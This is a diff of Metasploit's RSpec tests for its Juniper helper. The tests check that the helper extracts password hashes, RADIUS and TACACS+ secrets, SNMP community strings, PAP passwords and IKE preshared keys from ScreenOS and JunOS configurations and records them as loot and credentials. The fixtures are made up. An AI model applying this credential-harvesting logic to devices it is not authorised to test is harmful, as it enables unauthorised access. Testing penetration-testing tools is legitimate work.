+      expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper ScreenOS' })
       expect(aux_juniper).to receive(:store_loot).with(
-        "juniper.netscreen.config", "text/plain", "127.0.0.1",
-        "set ike gateway \"To-Cisco\" address 2.2.2.1 Main outgoing-interface \"ethernet1\" preshare \"netscreen\" proposal \"pre-g2-des-sha\"",
-        "config.txt", "Juniper Netscreen Configuration"
+        'juniper.netscreen.config', 'text/plain', '127.0.0.1',
+        'set ike gateway "To-Cisco" address 2.2.2.1 Main outgoing-interface "ethernet1" preshare "netscreen" proposal "pre-g2-des-sha"',
+        'config.txt', 'Juniper Netscreen Configuration'
       )
       expect(aux_juniper).to receive(:create_credential_and_login).with(
         {
-          address: "2.2.2.1",
+          address: '2.2.2.1',
           port: 500,
-          protocol: "udp",
+          protocol: 'udp',
           workspace_id: workspace.id,
           origin_type: :service,
           service_name: 'ike',
-          module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
-          private_data: "netscreen",
+          module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
+          private_data: 'netscreen',
           private_type: :password,
           status: Metasploit::Model::Login::Status::UNTRIED
         }
       )
-      aux_juniper.juniper_screenos_config_eater('127.0.0.1',1337,'set ike gateway "To-Cisco" address 2.2.2.1 Main outgoing-interface "ethernet1" preshare "netscreen" proposal "pre-g2-des-sha"')
+      aux_juniper.juniper_screenos_config_eater('127.0.0.1', 1337, 'set ike gateway "To-Cisco" address 2.2.2.1 Main outgoing-interface "ethernet1" preshare "netscreen" proposal "pre-g2-des-sha"')
     end
-
   end
 
   context '#juniper_junos_config_eater' do
@@ -248,63 +247,135 @@ RSpec.describe Msf::Auxiliary::Juniper do
 
     it 'deals with root credentials' do
       expect(aux_juniper).to receive(:print_good).with('root password hash: $1$pz9b1.fq$foo5r85Ql8mXdoRUe0C1E.')
-      expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper JunOS'})
-      #expect(aux_juniper).to receive(:store_loot).with(
+      expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper JunOS' })
+      # expect(aux_juniper).to receive(:store_loot).with(
       #  "juniper.netscreen.config", "text/plain", "127.0.0.1", "enable password 1511021F0725", "config.txt", "Cisco IOS Configuration"
-      #)
+      # )
       expect(aux_juniper).to receive(:create_credential_and_login).with(
         {
-          address: "127.0.0.1",
+          address: '127.0.0.1',
           port: 161,
-          protocol: "tcp",
+          protocol: 'tcp',
           workspace_id: workspace.id,
           origin_type: :service,
           service_name: '',
-          module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
-          username: "root",
-          private_data: "$1$pz9b1.fq$foo5r85Ql8mXdoRUe0C1E.",
-          jtr_format: "md5",
+          module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
+          username: 'root',
+          private_data: '$1$pz9b1.fq$foo5r85Ql8mXdoRUe0C1E.',
+          jtr_format: 'md5',
           private_type: :nonreplayable_hash,
           status: Metasploit::Model::Login::Status::UNTRIED
         }
       )
-      aux_juniper.juniper_junos_config_eater('127.0.0.1',161,
-        %q(system {
+      aux_juniper.juniper_junos_config_eater('127.0.0.1', 161,
+                                             %q(system {
              root-authentication {
                encrypted-password "$1$pz9b1.fq$foo5r85Ql8mXdoRUe0C1E."; ## SECRET-DATA
              }
            }
-        )
-      )
+        ))
     end
 
-    context 'deals with user account with password hash' do
-      it 'with super-user' do
-        expect(aux_juniper).to receive(:print_good).with('User 2000 named newuser in group super-user found with password hash $1$rm8FaMFY$k4LFxqsVAiGO5tKqyO9jJ/.')
-        expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper JunOS'})
-        expect(aux_juniper).to receive(:store_loot).with("juniper.junos.config", "text/plain", "127.0.0.1",
-          "system {\n                 login {\n                     user newuser {\n                         uid 2000;\n                         class super-user;\n                         authentication {\n                             encrypted-password \"$1$rm8FaMFY$k4LFxqsVAiGO5tKqyO9jJ/\"; ## SECRET-DATA\n                         }\n                     }\n                 }\n             }",
-          "config.txt", "Juniper JunOS Configuration"
-        )
+    context 'deals tacplus-server blocks' do
+      it 'with one cred' do
+        expect(aux_juniper).to receive(:print_good).with('tacplus server 1.1.1.1 with password hash $9$aaAAAAAeAA1AAAb2AAjAqmAA')
+        expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper JunOS' })
+        expect(aux_juniper).to receive(:store_loot).with('juniper.junos.config', 'text/plain', '127.0.0.1',
+                                                         "tacplus-server {\n                                                1.1.1.1 secret \"$9$aaAAAAAeAA1AAAb2AAjAqmAA\"; ## SECRET-DATA\n                                            }",
+                                                         'config.txt', 'Juniper JunOS Configuration')
         expect(aux_juniper).to receive(:create_credential_and_login).with(
           {
-            address: "127.0.0.1",
+            address: '127.0.0.1',
             port: 1337,
-            protocol: "tcp",
+            protocol: 'tcp',
             workspace_id: workspace.id,
             origin_type: :service,
             service_name: '',
-            module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
-            username: "newuser",
-            jtr_format: "md5",
-            private_data: "$1$rm8FaMFY$k4LFxqsVAiGO5tKqyO9jJ/",
+            module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
+            jtr_format: '',
+            private_data: '$9$aaAAAAAeAA1AAAb2AAjAqmAA',
             private_type: :nonreplayable_hash,
             status: Metasploit::Model::Login::Status::UNTRIED
           }
         )
 
-        aux_juniper.juniper_junos_config_eater('127.0.0.1',1337,
-          %q(system {
+        aux_juniper.juniper_junos_config_eater('127.0.0.1', 1337,
+                                               %q(tacplus-server {
+                                                1.1.1.1 secret "$9$aaAAAAAeAA1AAAb2AAjAqmAA"; ## SECRET-DATA
+                                            }))
+      end
+      it 'with two cred' do
+        expect(aux_juniper).to receive(:print_good).with('tacplus server 1.1.1.1 with password hash $9$aaAAAAAeAA1AAAb2AAjAqmAA')
+        expect(aux_juniper).to receive(:print_good).with('tacplus server 2.2.2.2 with password hash $9$aaaAa/1aAAAa1aaaAAaa11aAA')
+        expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper JunOS' })
+        expect(aux_juniper).to receive(:store_loot).with('juniper.junos.config', 'text/plain', '127.0.0.1',
+                                                         "tacplus-server {\n                                                1.1.1.1 secret \"$9$aaAAAAAeAA1AAAb2AAjAqmAA\"; ## SECRET-DATA\n                                                2.2.2.2 secret \"$9$aaaAa/1aAAAa1aaaAAaa11aAA\"; ## SECRET-DATA\n                                            }",
+                                                         'config.txt', 'Juniper JunOS Configuration')
+        expect(aux_juniper).to receive(:create_credential_and_login).with(
+          {
+            address: '127.0.0.1',
+            port: 1337,
+            protocol: 'tcp',
+            workspace_id: workspace.id,
+            origin_type: :service,
+            service_name: '',
+            module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
+            private_data: '$9$aaAAAAAeAA1AAAb2AAjAqmAA',
+            jtr_format: '',
+            private_type: :nonreplayable_hash,
+            status: Metasploit::Model::Login::Status::UNTRIED
+          }
+        )
+
+        expect(aux_juniper).to receive(:create_credential_and_login).with(
+          {
+            address: '127.0.0.1',
+            port: 1337,
+            protocol: 'tcp',
+            workspace_id: workspace.id,
+            origin_type: :service,
+            service_name: '',
+            module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
+            private_data: '$9$aaaAa/1aAAAa1aaaAAaa11aAA',
+            jtr_format: '',
+            private_type: :nonreplayable_hash,
+            status: Metasploit::Model::Login::Status::UNTRIED
+          }
+        )
+
+        aux_juniper.juniper_junos_config_eater('127.0.0.1', 1337,
+                                               %q(tacplus-server {
+                                                1.1.1.1 secret "$9$aaAAAAAeAA1AAAb2AAjAqmAA"; ## SECRET-DATA
+                                                2.2.2.2 secret "$9$aaaAa/1aAAAa1aaaAAaa11aAA"; ## SECRET-DATA
+                                            }))
+      end
+    end
+    context 'deals with user account with password hash' do
+      it 'with super-user' do
+        expect(aux_juniper).to receive(:print_good).with('User 2000 named newuser in group super-user found with password hash $1$rm8FaMFY$k4LFxqsVAiGO5tKqyO9jJ/.')
+        expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper JunOS' })
+        expect(aux_juniper).to receive(:store_loot).with('juniper.junos.config', 'text/plain', '127.0.0.1',
+                                                         "system {\n                 login {\n                     user newuser {\n                         uid 2000;\n                         class super-user;\n                         authentication {\n                             encrypted-password \"$1$rm8FaMFY$k4LFxqsVAiGO5tKqyO9jJ/\"; ## SECRET-DATA\n                         }\n                     }\n                 }\n             }",
+                                                         'config.txt', 'Juniper JunOS Configuration')
+        expect(aux_juniper).to receive(:create_credential_and_login).with(
+          {
+            address: '127.0.0.1',
+            port: 1337,
+            protocol: 'tcp',
+            workspace_id: workspace.id,
+            origin_type: :service,
+            service_name: '',
+            module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
+            username: 'newuser',
+            jtr_format: 'md5',
+            private_data: '$1$rm8FaMFY$k4LFxqsVAiGO5tKqyO9jJ/',
+            private_type: :nonreplayable_hash,
+            status: Metasploit::Model::Login::Status::UNTRIED
+          }
+        )
+
+        aux_juniper.juniper_junos_config_eater('127.0.0.1', 1337,
+                                               %q(system {
                  login {
                      user newuser {
                          uid 2000;
@@ -315,36 +386,34 @@ RSpec.describe Msf::Auxiliary::Juniper do
                      }
                  }
              }
-          )
-        )
+          ))
       end
 
       it 'with operator' do
         expect(aux_juniper).to receive(:print_good).with('User 2002 named newuser2 in group operator found with password hash $1$aDZi44AP$bQGGjqPJ.F.Cm5QvX2yaa0.')
-        expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper JunOS'})
-        expect(aux_juniper).to receive(:store_loot).with("juniper.junos.config", "text/plain", "127.0.0.1",
-          "system {\n                 login {\n                     user newuser2 {\n                         uid 2002;\n                         class operator;\n                         authentication {\n                             encrypted-password \"$1$aDZi44AP$bQGGjqPJ.F.Cm5QvX2yaa0\"; ## SECRET-DATA\n                         }\n                     }\n                 }\n             }",
-          "config.txt", "Juniper JunOS Configuration"
-        )
+        expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper JunOS' })
+        expect(aux_juniper).to receive(:store_loot).with('juniper.junos.config', 'text/plain', '127.0.0.1',
+                                                         "system {\n                 login {\n                     user newuser2 {\n                         uid 2002;\n                         class operator;\n                         authentication {\n                             encrypted-password \"$1$aDZi44AP$bQGGjqPJ.F.Cm5QvX2yaa0\"; ## SECRET-DATA\n                         }\n                     }\n                 }\n             }",
+                                                         'config.txt', 'Juniper JunOS Configuration')
         expect(aux_juniper).to receive(:create_credential_and_login).with(
           {
-            address: "127.0.0.1",
+            address: '127.0.0.1',
             port: 1337,
-            protocol: "tcp",
+            protocol: 'tcp',
             workspace_id: workspace.id,
             origin_type: :service,
             service_name: '',
-            module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
-            username: "newuser2",
-            jtr_format: "md5",
-            private_data: "$1$aDZi44AP$bQGGjqPJ.F.Cm5QvX2yaa0",
+            module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
+            username: 'newuser2',
+            jtr_format: 'md5',
+            private_data: '$1$aDZi44AP$bQGGjqPJ.F.Cm5QvX2yaa0',
             private_type: :nonreplayable_hash,
             status: Metasploit::Model::Login::Status::UNTRIED
           }
         )
 
-        aux_juniper.juniper_junos_config_eater('127.0.0.1',1337,
-          %q(system {
+        aux_juniper.juniper_junos_config_eater('127.0.0.1', 1337,
+                                               %q(system {
                  login {
                      user newuser2 {
                          uid 2002;
@@ -355,36 +424,73 @@ RSpec.describe Msf::Auxiliary::Juniper do
                      }
                  }
              }
-          )
-        )
+          ))
       end
 
-      it 'with read-only' do
-        expect(aux_juniper).to receive(:print_good).with('User 2003 named newuser3 in group read-only found with password hash $1$1.YvKzUY$dcAj99KngGhFZTpxGjA93..')
-        expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper JunOS'})
-        expect(aux_juniper).to receive(:store_loot).with("juniper.junos.config", "text/plain", "127.0.0.1",
-          "system {\n                 login {\n                     user newuser3 {\n                         uid 2003;\n                         class read-only;\n                         authentication {\n                             encrypted-password \"$1$1.YvKzUY$dcAj99KngGhFZTpxGjA93.\"; ## SECRET-DATA\n                         }\n                     }\n                 }\n             }",
-          "config.txt", "Juniper JunOS Configuration"
-        )
+      it 'with a full-name and custom class' do
+        expect(aux_juniper).to receive(:print_good).with('User 2002 named newuser2 in group EXAMPLE found with password hash $1$aDZi44AP$bQGGjqPJ.F.Cm5QvX2yaa0.')
+        expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper JunOS' })
+        expect(aux_juniper).to receive(:store_loot).with('juniper.junos.config', 'text/plain', '127.0.0.1',
+                                                         "system {\n            login {\n                user newuser2 {\n                    full-name \"test\";\n                    uid 2002;\n                    class EXAMPLE;\n                    authentication {\n                        encrypted-password \"$1$aDZi44AP$bQGGjqPJ.F.Cm5QvX2yaa0\"; ## SECRET-DATA\n                    }\n                }\n            }\n        }",
+                                                         'config.txt', 'Juniper JunOS Configuration')
         expect(aux_juniper).to receive(:create_credential_and_login).with(
           {
-            address: "127.0.0.1",
+            address: '127.0.0.1',
             port: 1337,
-            protocol: "tcp",
+            protocol: 'tcp',
             workspace_id: workspace.id,
             origin_type: :service,
             service_name: '',
-            module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
-            username: "newuser3",
-            jtr_format: "md5",
-            private_data: "$1$1.YvKzUY$dcAj99KngGhFZTpxGjA93.",
+            module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
+            username: 'newuser2',
+            jtr_format: 'md5',
+            private_data: '$1$aDZi44AP$bQGGjqPJ.F.Cm5QvX2yaa0',
             private_type: :nonreplayable_hash,
             status: Metasploit::Model::Login::Status::UNTRIED
           }
         )
 
-        aux_juniper.juniper_junos_config_eater('127.0.0.1',1337,
-          %q(system {
+        aux_juniper.juniper_junos_config_eater('127.0.0.1', 1337,
+                                               %q(system {
+            login {
+                user newuser2 {
+                    full-name "test";
+                    uid 2002;
+                    class EXAMPLE;
+                    authentication {
+                        encrypted-password "$1$aDZi44AP$bQGGjqPJ.F.Cm5QvX2yaa0"; ## SECRET-DATA
+                    }
+                }
+            }
+        }
+     ))
+      end
+
+      it 'with read-only' do
+        expect(aux_juniper).to receive(:print_good).with('User 2003 named newuser3 in group read-only found with password hash $1$1.YvKzUY$dcAj99KngGhFZTpxGjA93..')
+        expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper JunOS' })
+        expect(aux_juniper).to receive(:store_loot).with('juniper.junos.config', 'text/plain', '127.0.0.1',
+                                                         "system {\n                 login {\n                     user newuser3 {\n                         uid 2003;\n                         class read-only;\n                         authentication {\n                             encrypted-password \"$1$1.YvKzUY$dcAj99KngGhFZTpxGjA93.\"; ## SECRET-DATA\n                         }\n                     }\n                 }\n             }",
+                                                         'config.txt', 'Juniper JunOS Configuration')
+        expect(aux_juniper).to receive(:create_credential_and_login).with(
+          {
+            address: '127.0.0.1',
+            port: 1337,
+            protocol: 'tcp',
+            workspace_id: workspace.id,
+            origin_type: :service,
+            service_name: '',
+            module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
+            username: 'newuser3',
+            jtr_format: 'md5',
+            private_data: '$1$1.YvKzUY$dcAj99KngGhFZTpxGjA93.',
+            private_type: :nonreplayable_hash,
+            status: Metasploit::Model::Login::Status::UNTRIED
+          }
+        )
+
+        aux_juniper.juniper_junos_config_eater('127.0.0.1', 1337,
+                                               %q(system {
                  login {
                      user newuser3 {
                          uid 2003;
@@ -395,36 +501,34 @@ RSpec.describe Msf::Auxiliary::Juniper do
                      }
                  }
              }
-          )
-        )
+          ))
       end
 
       it 'with unauthorized' do
         expect(aux_juniper).to receive(:print_good).with('User 2004 named newuser4 in group unauthorized found with password hash $1$bdWYaqOE$z6oTSJS3p1R8CoNaos9Ce/.')
-        expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper JunOS'})
-        expect(aux_juniper).to receive(:store_loot).with("juniper.junos.config", "text/plain", "127.0.0.1",
-          "system {\n                 login {\n                     user newuser4 {\n                         uid 2004;\n                         class unauthorized;\n                         authentication {\n                             encrypted-password \"$1$bdWYaqOE$z6oTSJS3p1R8CoNaos9Ce/\"; ## SECRET-DATA\n                         }\n                     }\n                 }\n             }",
-          "config.txt", "Juniper JunOS Configuration"
-        )
+        expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper JunOS' })
+        expect(aux_juniper).to receive(:store_loot).with('juniper.junos.config', 'text/plain', '127.0.0.1',
+                                                         "system {\n                 login {\n                     user newuser4 {\n                         uid 2004;\n                         class unauthorized;\n                         authentication {\n                             encrypted-password \"$1$bdWYaqOE$z6oTSJS3p1R8CoNaos9Ce/\"; ## SECRET-DATA\n                         }\n                     }\n                 }\n             }",
+                                                         'config.txt', 'Juniper JunOS Configuration')
         expect(aux_juniper).to receive(:create_credential_and_login).with(
           {
-            address: "127.0.0.1",
+            address: '127.0.0.1',
             port: 1337,
-            protocol: "tcp",
+            protocol: 'tcp',
             workspace_id: workspace.id,
             origin_type: :service,
             service_name: '',
-            module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
-            username: "newuser4",
-            jtr_format: "md5",
-            private_data: "$1$bdWYaqOE$z6oTSJS3p1R8CoNaos9Ce/",
+            module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
+            username: 'newuser4',
+            jtr_format: 'md5',
+            private_data: '$1$bdWYaqOE$z6oTSJS3p1R8CoNaos9Ce/',
             private_type: :nonreplayable_hash,
             status: Metasploit::Model::Login::Status::UNTRIED
           }
         )
 
-        aux_juniper.juniper_junos_config_eater('127.0.0.1',1337,
-          %q(system {
+        aux_juniper.juniper_junos_config_eater('127.0.0.1', 1337,
+                                               %q(system {
                  login {
                      user newuser4 {
                          uid 2004;
@@ -435,160 +539,221 @@ RSpec.describe Msf::Auxiliary::Juniper do
                      }
                  }
              }
-          )
-        )
+          ))
       end
-
     end
 
     context 'deals with snmp-server community' do
-
       it 'with Read permissions' do
         expect(aux_juniper).to receive(:print_good).with('SNMP community read with permissions read-only')
-        expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper JunOS'})
+        expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper JunOS' })
         expect(aux_juniper).to receive(:create_credential_and_login).with(
           {
-            address: "127.0.0.1",
+            address: '127.0.0.1',
             port: 161,
-            protocol: "udp",
+            protocol: 'udp',
             workspace_id: workspace.id,
             origin_type: :service,
             service_name: 'snmp',
-            module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
-            private_data: "read",
+            module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
+            private_data: 'read',
             private_type: :password,
             status: Metasploit::Model::Login::Status::UNTRIED,
             access_level: 'RO'
           }
         )
-        aux_juniper.juniper_junos_config_eater('127.0.0.1',1337,
-          %q(snmp {
+        aux_juniper.juniper_junos_config_eater('127.0.0.1', 1337,
+                                               %q(snmp {
                  community read {
                      authorization read-only;
                  }
              }
-          )
-        )
+          ))
       end
 
       it 'with Read-Write permissions and view' do
         expect(aux_juniper).to receive(:print_good).with('SNMP community write with permissions read-write')
-        expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper JunOS'})
+        expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper JunOS' })
         expect(aux_juniper).to receive(:create_credential_and_login).with(
           {
-            address: "127.0.0.1",
+            address: '127.0.0.1',
             port: 161,
-            protocol: "udp",
+            protocol: 'udp',
             workspace_id: workspace.id,
             origin_type: :service,
             service_name: 'snmp',
-            module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
-            private_data: "write",
+            module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
+            private_data: 'write',
             private_type: :password,
             status: Metasploit::Model::Login::Status::UNTRIED,
             access_level: 'RW'
           }
         )
-        aux_juniper.juniper_junos_config_eater('127.0.0.1',1337,
-          %q(snmp {
+        aux_juniper.juniper_junos_config_eater('127.0.0.1', 1337,
+                                               %q(snmp {
                  community write {
                      view jweb-view-all;
                      authorization read-write;
                  }
              }
-          )
-        )
+          ))
       end
 
       it 'with a space in the community string' do
         expect(aux_juniper).to receive(:print_good).with('SNMP community hello there with permissions read-write')
-        expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper JunOS'})
+        expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper JunOS' })
         expect(aux_juniper).to receive(:create_credential_and_login).with(
           {
-            address: "127.0.0.1",
+            address: '127.0.0.1',
             port: 161,
-            protocol: "udp",
+            protocol: 'udp',
             workspace_id: workspace.id,
             origin_type: :service,
             service_name: 'snmp',
-            module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
-            private_data: "hello there",
+            module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
+            private_data: 'hello there',
             private_type: :password,
             status: Metasploit::Model::Login::Status::UNTRIED,
             access_level: 'RW'
           }
         )
-        aux_juniper.juniper_junos_config_eater('127.0.0.1',1337,
-          %q(snmp {
+        aux_juniper.juniper_junos_config_eater('127.0.0.1', 1337,
+                                               %q(snmp {
                  community "hello there" {
                      authorization read-write;
                  }
              }
-          )
-        )
+          ))
       end
 
-
+      it 'with special characters in the community string' do
+        expect(aux_juniper).to receive(:print_good).with('SNMP community aAa321$+!AaAaaa with permissions read-only')
+        expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper JunOS' })
+        expect(aux_juniper).to receive(:create_credential_and_login).with(
+          {
+            address: '127.0.0.1',
+            port: 161,
+            protocol: 'udp',
+            workspace_id: workspace.id,
+            origin_type: :service,
+            service_name: 'snmp',
+            module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
+            private_data: 'aAa321$+!AaAaaa',
+            private_type: :password,
+            status: Metasploit::Model::Login::Status::UNTRIED,
+            access_level: 'RO'
+          }
+        )
+        aux_juniper.juniper_junos_config_eater('127.0.0.1', 1337,
+                                               %q(snmp {
+                 community "aAa321$+!AaAaaa" {
+                     authorization read-only;
+                 }
+             }
+          ))
+      end
     end
-
-    it 'deals with radius' do
-      expect(aux_juniper).to receive(:print_good).with('radius server 1.1.1.1 password hash: $9$Y-4GikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKvWdV')
-      expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper JunOS'})
-      expect(aux_juniper).to receive(:store_loot).with("juniper.junos.config", "text/plain", "127.0.0.1",
-        "access {\n              radius-server {\n                  1.1.1.1 secret \"$9$Y-4GikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKvWdV\"; ## SECRET-DATA\n              }\n           }",
-        "config.txt", "Juniper JunOS Configuration"
-      )
-      expect(aux_juniper).to receive(:create_credential_and_login).with(
-        {
-          address: "1.1.1.1",
-          port: 1812,
-          protocol: "udp",
-          workspace_id: workspace.id,
-          origin_type: :service,
-          service_name: 'radius',
-          module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
-          private_data: "$9$Y-4GikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKvWdV",
-          private_type: :nonreplayable_hash,
-          status: Metasploit::Model::Login::Status::UNTRIED
-        }
-      )
-      aux_juniper.juniper_junos_config_eater('127.0.0.1',1337,
-        %q(access {
+    context 'deals radius-server blocks' do
+      it 'with one credential' do
+        expect(aux_juniper).to receive(:print_good).with('radius server 1.1.1.1 password hash: $9$Y-4GikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKvWdV')
+        expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper JunOS' })
+        expect(aux_juniper).to receive(:store_loot).with('juniper.junos.config', 'text/plain', '127.0.0.1',
+                                                         "access {\n              radius-server {\n                  1.1.1.1 secret \"$9$Y-4GikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKvWdV\"; ## SECRET-DATA\n              }\n           }",
+                                                         'config.txt', 'Juniper JunOS Configuration')
+        expect(aux_juniper).to receive(:create_credential_and_login).with(
+          {
+            address: '1.1.1.1',
+            port: 1812,
+            protocol: 'udp',
+            workspace_id: workspace.id,
+            origin_type: :service,
+            service_name: 'radius',
+            module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
+            private_data: '$9$Y-4GikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKvWdV',
+            private_type: :nonreplayable_hash,
+            status: Metasploit::Model::Login::Status::UNTRIED
+          }
+        )
+        aux_juniper.juniper_junos_config_eater('127.0.0.1', 1337,
+                                               %q(access {
               radius-server {
                   1.1.1.1 secret "$9$Y-4GikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKvWdV"; ## SECRET-DATA
               }
            }
-        )
-      )
-    end
+        ))
+      end
 
+      it 'with two credentials' do
+        expect(aux_juniper).to receive(:print_good).with('radius server 2.2.2.2 password hash: $9$Y-11ikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKv111')
+        expect(aux_juniper).to receive(:print_good).with('radius server 1.1.1.1 password hash: $9$Y-4GikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKvWdV')
+        expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper JunOS' })
+        expect(aux_juniper).to receive(:store_loot).with('juniper.junos.config', 'text/plain', '127.0.0.1',
+                                                         "access {\n              radius-server {\n                  1.1.1.1 secret \"$9$Y-4GikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKvWdV\"; ## SECRET-DATA\n                  2.2.2.2 secret \"$9$Y-11ikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKv111\"; ## SECRET-DATA\n              }\n           }",
+                                                         'config.txt', 'Juniper JunOS Configuration')
+        expect(aux_juniper).to receive(:create_credential_and_login).with(
+          {
+            address: '1.1.1.1',
+            port: 1812,
+            protocol: 'udp',
+            workspace_id: workspace.id,
+            origin_type: :service,
+            service_name: 'radius',
+            module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
+            private_data: '$9$Y-4GikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKvWdV',
+            private_type: :nonreplayable_hash,
+            status: Metasploit::Model::Login::Status::UNTRIED
+          }
+        )
+        expect(aux_juniper).to receive(:create_credential_and_login).with(
+          {
+            address: '2.2.2.2',
+            port: 1812,
+            protocol: 'udp',
+            workspace_id: workspace.id,
+            origin_type: :service,
+            service_name: 'radius',
+            module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
+            private_data: '$9$Y-11ikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKv111',
+            private_type: :nonreplayable_hash,
+            status: Metasploit::Model::Login::Status::UNTRIED
+          }
+        )
+        aux_juniper.juniper_junos_config_eater('127.0.0.1', 1337,
+                                               %q(access {
+              radius-server {
+                  1.1.1.1 secret "$9$Y-4GikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKvWdV"; ## SECRET-DATA
+                  2.2.2.2 secret "$9$Y-11ikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKv111"; ## SECRET-DATA
+              }
+           }
+        ))
+      end
+    end
     it 'deals with pap' do
       expect(aux_juniper).to receive(:print_good).with('PPTP username \'pap_username\' hash $9$he4revM87-dsevm5TQCAp0BErvLxd4JDNdkPfT/9BIR via PAP')
-      expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper JunOS'})
-      expect(aux_juniper).to receive(:store_loot).with("juniper.junos.config", "text/plain", "127.0.0.1",
-        "interfaces {\n               pp0 {\n                   unit 0 {\n                       ppp-options {\n                           pap {\n                               local-name \"'pap_username'\";\n                               local-password \"$9$he4revM87-dsevm5TQCAp0BErvLxd4JDNdkPfT/9BIR\"; ## SECRET-DATA\n                           }\n                      }\n                  }\n               }\n           }",
-        "config.txt", "Juniper JunOS Configuration"
-      )
-      #expect(aux_juniper).to receive(:store_loot).with(
+      expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper JunOS' })
+      expect(aux_juniper).to receive(:store_loot).with('juniper.junos.config', 'text/plain', '127.0.0.1',
+                                                       "interfaces {\n               pp0 {\n                   unit 0 {\n                       ppp-options {\n                           pap {\n                               local-name \"'pap_username'\";\n                               local-password \"$9$he4revM87-dsevm5TQCAp0BErvLxd4JDNdkPfT/9BIR\"; ## SECRET-DATA\n                           }\n                      }\n                  }\n               }\n           }",
+                                                       'config.txt', 'Juniper JunOS Configuration')
+      # expect(aux_juniper).to receive(:store_loot).with(
       #  "cisco.ios.config", "text/plain", "127.0.0.1", "password 5 1511021F0725", "config.txt", "Cisco IOS Configuration"
-      #)
+      # )
       expect(aux_juniper).to receive(:create_credential_and_login).with(
         {
-          address: "127.0.0.1",
+          address: '127.0.0.1',
           port: 1723,
-          protocol: "tcp",
+          protocol: 'tcp',
           workspace_id: workspace.id,
           origin_type: :service,
           service_name: 'pptp',
-          module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
-          private_data: "$9$he4revM87-dsevm5TQCAp0BErvLxd4JDNdkPfT/9BIR",
+          module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
+          private_data: '$9$he4revM87-dsevm5TQCAp0BErvLxd4JDNdkPfT/9BIR',
           username: "'pap_username'",
           private_type: :nonreplayable_hash,
           status: Metasploit::Model::Login::Status::UNTRIED
         }
       )
-      aux_juniper.juniper_junos_config_eater('127.0.0.1',1337,
-        %q(interfaces {
+      aux_juniper.juniper_junos_config_eater('127.0.0.1', 1337,
+                                             %q(interfaces {
                pp0 {
                    unit 0 {
                        ppp-options {
